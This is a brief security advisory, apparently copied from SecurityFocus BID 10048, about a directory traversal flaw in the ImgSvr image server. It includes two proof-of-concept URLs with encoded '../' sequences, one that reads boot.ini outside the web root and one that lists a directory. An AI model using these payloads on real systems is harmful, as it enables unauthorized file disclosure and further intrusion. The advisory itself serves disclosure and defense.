11 lines
No EOL
629 B
Text
Executable file
11 lines
No EOL
629 B
Text
Executable file
source: http://www.securityfocus.com/bid/10048/info
|
|
|
|
ImgSvr is prone to an issue that may allow an attacker to view files that reside outside of the server root directory. This issue occurs because the application fails to properly sanitize user-supplied URI data.
|
|
|
|
A successful exploit may allow a remote attacker to access sensitive information that may be used to launch further attacks against a vulnerable system.
|
|
|
|
To view a selected file:
|
|
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini
|
|
|
|
To list a directory:
|
|
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/ |